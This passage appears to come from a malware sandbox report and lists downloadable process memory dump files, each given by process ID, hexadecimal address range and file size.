memory/4576-405-0x00000000746F0000-0x0000000074827000-memory.dmp

Filesize
1.2MB

Download
memory/4576-406-0x00000000746D0000-0x00000000746E6000-memory.dmp

Filesize
88KB

Download
memory/4576-409-0x00000000745B0000-0x0000000074644000-memory.dmp

Filesize
592KB

Download
memory/4860-358-0x0000000005B00000-0x0000000005B4C000-memory.dmp

Filesize
304KB

Download
memory/4956-272-0x0000000007710000-0x0000000007718000-memory.dmp

Filesize
32KB

Download
memory/5096-253-0x0000000007A40000-0x0000000007AD6000-memory.dmp

Filesize
600KB

Download
memory/5096-252-0x0000000007830000-0x000000000783A000-memory.dmp

Filesize
40KB

Download
memory/5096-251-0x00000000077C0000-0x00000000077DA000-memory.dmp

Filesize
104KB

Download
memory/5096-250-0x0000000007E10000-0x000000000848A000-memory.dmp

Filesize
6.5MB

Download
memory/5096-240-0x000000006D720000-0x000000006D76C000-memory.dmp

Filesize
304KB

Download
memory/5096-117-0x0000000005E00000-0x0000000005E66000-memory.dmp

Filesize
408KB

Download
memory/5096-118-0x0000000005E70000-0x0000000005ED6000-memory.dmp

Filesize
408KB

Download
memory/5096-116-0x00000000055D0000-0x00000000055F2000-memory.dmp

Filesize
136KB

Download
memory/5532-365-0x000000001BE40000-0x000000001BE52000-memory.dmp

Filesize
72KB

Download
memory/5532-344-0x0000000000550000-0x000000000088E000-memory.dmp

Filesize
3.2MB

Download
memory/5532-379-0x000000001BF70000-0x000000001BF78000-memory.dmp

Filesize
32KB

Download
memory/5532-389-0x000000001C210000-0x000000001C218000-memory.dmp

Filesize
32KB

Download
memory/5532-391-0x000000001C230000-0x000000001C23C000-memory.dmp

Filesize
48KB

Download
memory/5532-388-0x000000001C200000-0x000000001C208000-memory.dmp

Filesize
32KB

Download
memory/5532-390-0x000000001C220000-0x000000001C22A000-memory.dmp

Filesize
40KB

Download
memory/5532-387-0x000000001C1F0000-0x000000001C1FE000-memory.dmp

Filesize
56KB

Download
memory/5532-386-0x000000001C1E0000-0x000000001C1E8000-memory.dmp

Filesize
32KB

Download
memory/5532-385-0x000000001C1D0000-0x000000001C1DE000-memory.dmp

Filesize
56KB

Download
memory/5532-360-0x000000001B4D0000-0x000000001B4EC000-memory.dmp

Filesize
112KB

Download
memory/5532-363-0x000000001BD10000-0x000000001BD26000-memory.dmp

Filesize
88KB

Download
memory/5532-366-0x000000001BE70000-0x000000001BE7C000-memory.dmp

Filesize
48KB

Download
memory/5532-364-0x000000001BD30000-0x000000001BD38000-memory.dmp

Filesize
32KB

Download
memory/5532-361-0x000000001BB80000-0x000000001BBD0000-memory.dmp

Filesize
320KB

Download
memory/5532-362-0x000000001B4F0000-0x000000001B4F8000-memory.dmp

Filesize
32KB

Download
memory/5532-381-0x000000001BF90000-0x000000001BF9C000-memory.dmp

Filesize
48KB

Download
memory/5532-357-0x0000000002AA0000-0x0000000002AAE000-memory.dmp

Filesize
56KB

Download
memory/5532-356-0x0000000002910000-0x000000000291E000-memory.dmp

Filesize
56KB

Download
memory/5532-380-0x000000001BF80000-0x000000001BF8C000-memory.dmp

Filesize
48KB

Download
memory/5532-384-0x000000001C1C0000-0x000000001C1CA000-memory.dmp

Filesize
40KB

Download
memory/5532-383-0x000000001C1B0000-0x000000001C1BC000-memory.dmp

Filesize
48KB

Download
memory/5532-382-0x000000001C1A0000-0x000000001C1A8000-memory.dmp

Filesize
32KB

Download
memory/5532-372-0x000000001BEF0000-0x000000001BEF8000-memory.dmp

Filesize
32KB

Download
memory/5532-371-0x000000001BEE0000-0x000000001BEEC000-memory.dmp

Filesize
48KB

Download
memory/5532-367-0x000000001BE50000-0x000000001BE58000-memory.dmp

Filesize
32KB

Download
memory/5532-359-0x0000000002AB0000-0x0000000002AB8000-memory.dmp

Filesize
32KB

Download
memory/5532-376-0x000000001C480000-0x000000001C9A8000-memory.dmp

Filesize
5.2MB

Download
memory/5532-377-0x000000001BF50000-0x000000001BF58000-memory.dmp

Filesize
32KB

Download
memory/5532-368-0x000000001BE60000-0x000000001BE70000-memory.dmp

Filesize
64KB

Download
memory/5532-378-0x000000001BF60000-0x000000001BF6C000-memory.dmp

Filesize
48KB

Download
memory/5532-373-0x000000001BF00000-0x000000001BF0C000-memory.dmp

Filesize
48KB

Download
memory/5532-374-0x000000001BF10000-0x000000001BF18000-memory.dmp

Filesize
32KB

Download
memory/5532-375-0x000000001BF20000-0x000000001BF32000-memory.dmp

Filesize
72KB

Download
memory/5532-369-0x000000001BE80000-0x000000001BE8A000-memory.dmp

Filesize
40KB

Download
memory/5532-370-0x000000001BE90000-0x000000001BEE6000-memory.dmp

Filesize
344KB

Download
memory/5572-474-0x000000001AFF0000-0x000000001B002000-memory.dmp

Filesize
72KB

Download